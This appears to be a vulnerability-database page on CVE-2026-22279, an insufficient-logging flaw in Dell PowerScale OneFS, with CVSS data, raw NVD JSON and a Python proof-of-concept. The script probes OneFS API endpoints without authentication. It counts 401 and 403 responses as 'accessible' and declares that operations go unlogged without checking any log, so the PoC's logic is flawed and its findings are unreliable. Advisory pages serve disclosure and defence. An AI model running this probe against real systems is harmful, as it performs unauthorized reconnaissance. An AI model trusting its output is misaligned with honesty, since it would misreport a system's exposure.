Security Vulnerability Report
中文
CVE-2026-22279 CVSS 4.3 MEDIUM

CVE-2026-22279

Published: 2026-01-22 19:15:57
Last Modified: 2026-01-28 18:16:39
Source: [email protected]

Description

Dell PowerScale OneFS, versions prior 9.13.0.0, contains an insufficient logging vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information tampering.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:dell:powerscale_onefs:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerScale OneFS < 9.13.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22279 PoC - Dell PowerScale OneFS Insufficient Logging # Target: Dell PowerScale OneFS < 9.13.0.0 # Type: Insufficient Logging leading to Information Tampering import requests import sys import time from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def test_cve_2026_22279(target_url): """ Test for CVE-2026-22279: Insufficient Logging in Dell PowerScale OneFS This PoC demonstrates the lack of proper audit logging for certain operations. """ print(f"[*] Testing CVE-2026-22279 on {target_url}") print(f"[*] Target: Dell PowerScale OneFS < 9.13.0.0") # Test endpoints that should be logged but aren't endpoints = [ "/platform/1/auth/users", "/platform/1/cluster/config", "/platform/1/protocols/smb/shares" ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"\n[*] Testing endpoint: {endpoint}") try: # Send request without authentication (unauthenticated access) response = requests.get(url, timeout=10, verify=False) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") # Check if the request was successful if response.status_code in [200, 401, 403]: print(f"[!] Endpoint is accessible, but operation may not be logged") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") print("\n[*] Note: In a properly logged system, all these requests should be recorded") print("[*] in the audit log with timestamps, source IPs, and user credentials") print("[*] For CVE-2026-22279, these operations lack proper audit trail") def check_audit_logs(target_url): """ Check if operations are being properly logged """ print("\n[*] Checking audit log configuration...") # Attempt to access audit logs audit_url = target_url.rstrip('/') + "/platform/1/audit/logs" try: response = requests.get(audit_url, timeout=10, verify=False) print(f"[*] Audit log access status: {response.status_code}") except: print("[-] Unable to access audit logs") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2026_22279.py <target_url>") print("Example: python cve_2026_22279.py https://192.168.1.100") sys.exit(1) target = sys.argv[1] test_cve_2026_22279(target) check_audit_logs(target) print("\n[*] Testing complete")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22279", "sourceIdentifier": "[email protected]", "published": "2026-01-22T19:15:56.843", "lastModified": "2026-01-28T18:16:38.627", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerScale OneFS, versions prior 9.13.0.0, contains an insufficient logging vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information tampering."}, {"lang": "es", "value": "Dell PowerScale OneFS, versiones anteriores a la 9.13.0.0, contiene una vulnerabilidad de registro insuficiente. Un atacante no autenticado con acceso remoto podría potencialmente explotar esta vulnerabilidad, lo que podría llevar a la manipulación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-778"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:powerscale_onefs:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.13.0.0", "matchCriteriaId": "D004A551-1E20-4170-A949-143E488FA9C9"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.